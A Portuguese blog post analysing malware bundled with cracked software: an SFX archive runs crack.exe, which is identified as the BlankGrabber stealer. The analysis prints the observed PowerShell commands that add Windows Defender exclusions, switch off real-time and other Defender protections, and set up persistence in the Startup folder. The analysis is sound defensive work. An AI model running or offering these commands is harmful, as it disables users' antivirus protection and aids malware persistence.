Eu já baixei muitos programas crackeados na internet, então é normal que a grande maioria esteja infectada com algum malware. Neste post, vou mostrar a análise de um desses malwares que eu já encontrei pela internet.
Análise do Malware
Como primeiro exemplo, peguei um programa de um site bem conhecido por fornecer programas crackeados. Todos os programas que têm sido postados nesse site apresentam o mesmo malware e utilizam o mesmo tipo de técnica para infectar os arquivos.
Basicamente, eles fornecem o arquivo .rar do software crackeado, mas ao extrair, nos deparamos com a seguinte situação:
Se dermos uma olhada nesse arquivo SFX, vamos ver o seguinte:
Como podemos ver, após a extração dos arquivos, um executável chamado crack.exe será executado. Vamos extrair esse arquivo e ver o que o crack.exe faz:
Como podemos ver, após extrair, o programa crack.exe é executado e solicita permissão de administrador. Após isso, ele inicia um processo filho que chama três prompts de comando, os quais executam as seguintes tarefas:
| Operation | Process | Additional Information |
| --- | --- | --- |
| Process 1 | c:\users\vithor\desktop\crack.exe | "C:\Users\Vithor\Desktop\crack.exe" |
| Process 1 | c:\users\Vithor\desktop\crack.exe | "C:\Users\Vithor\Desktop\crack.exe" |
| Process 3 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Vithor\Desktop\crack.exe'" |
| Process 4 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection ...
| Process 5 | c:\windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" |
Resumindo a ação que cada prompt de comando está executando:
- 1 cmd.exe 1 -> Usa o PowerShell que adiciona uma exclusão para o arquivo crack.exe no Windows Defender.
- 2 cmd.exe 2 -> Executando um comando PowerShell para desativar várias proteções do Windows Defender, incluindo o sistema de prevenção de intrusões e a verificação em tempo real.
- 3 cmd.exe 3 -> Usa o PowerShell que adiciona uma exclusão para um arquivo .scr localizado na pasta de inicialização do sistema.
Diagrama para melhor entendimento:
Vamos jogar o crack.exe no Detect It Easy para ver o que ele nos fala sobre o arquivo:
Pelo visto, o arquivo crack.exe estabelece uma persistência em um arquivo localizado na pasta de inicialização do sistema. Vamos verificar esse arquivo:
Vamos verificar se esse arquivo faz a mesma coisa que o crack.exe:
Como podemos ver, o arquivo faz exatamente a mesma coisa que o crack.exe.
Vamos jogar o crack.exe no VirusTotal para conseguir obter mais informações sobre o que esse arquivo é:
Como podemos ver, é um arquivo bastante detectável no VirusTotal. Se olharmos na aba comunidade, vamos ver que o arquivo é um Malware conhecido como BlankGrabber.
Se formos dar uma olhada no que é o BlankGrabber, vamos encontrar um repositório no GitHub do projeto.
Como podemos ver, trata-se de um stealer. Obviamente, isso não é uma análise de malware nem mesmo intermediária, mas já é um começo.